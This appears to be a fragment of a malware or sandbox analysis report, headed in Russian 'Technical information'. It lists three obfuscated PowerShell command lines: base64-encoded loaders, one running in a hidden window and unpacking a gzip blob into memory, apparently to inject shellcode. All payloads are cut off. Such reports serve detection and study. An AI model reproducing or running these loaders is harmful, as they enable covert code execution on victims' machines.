Техническая информация
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ec JABPAGcAPQAnACQAWABIAD0AJwAnAFsAVgBYAHQAKAAoACIAbQBzACIAKwAiAHYAIgArACIAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAZgBFAHQAKAB1A...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e JABYAEgAPQAnAFsAVgBYAHQAKAAoACIAbQBzACIAKwAiAHYAIgArACIAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAZgBFAHQAKAB1AGkAbgB0ACAAZAB3AF...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden /c "$c=New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"H4sIAICljlwC/61ZXVPbyBL9K7yR1NbdssHJ3q2tfWhh+QMiO7NESeQ3EK6BiMRcDAj7198+M5ruMRJwk7pPYtya/jqne4bWen//YS+92/vX... (со скрытым окном)